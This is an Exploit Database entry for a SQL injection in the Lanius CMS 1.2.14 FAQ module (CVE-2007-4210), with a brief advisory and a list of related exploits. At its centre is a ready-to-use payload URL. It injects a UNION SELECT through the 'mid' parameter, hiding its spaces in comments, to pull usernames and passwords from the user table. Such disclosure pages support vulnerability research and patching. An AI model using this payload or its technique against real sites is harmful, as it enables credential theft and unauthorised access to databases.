Exploit Database - Logo

Lanius CMS 1.2.14 FAQ Module - 'mid' Parameter SQL Injection

EDB-ID: 30448 Author: k1tk4t Published: 2007-08-03
CVE: CVE-2007-4210 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/25193/info

LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

LANAI CMS 1.2.14 is vulnerable; other versions may also be affected. 

http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*

Related Exploits

Trying to match CVEs (1): CVE-2007-4210
Trying to match OSVDBs (1): 36438
Trying to match setup file: bde41a31e1b055ec78c97e0945b0a4b0
Other Possible E-DB Search Terms: Lanius CMS 1.2.14 FAQ Module,  Lanius CMS
Date D V Title Author
2007-08-06Download Exploit Code Verified Lanius CMS 1.2.14 - Multiple SQL Injectionsk1tk4t
2007-08-03Download Exploit Code Verified Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' Parameter SQL Injectionk1tk4t
2007-08-03Download Exploit Code Verified Lanius CMS 1.2.14 GALLERY Module - gid Parameter SQL Injectionk1tk4t
2008-05-14Download Exploit Code Verified Lanius CMS 1.2.16 - 'FCKeditor' Arbitrary File UploadEgiX
2009-04-07Download Exploit Code Verified Lanius CMS 0.5.2 - Arbitrary File UploadEgiX
Menu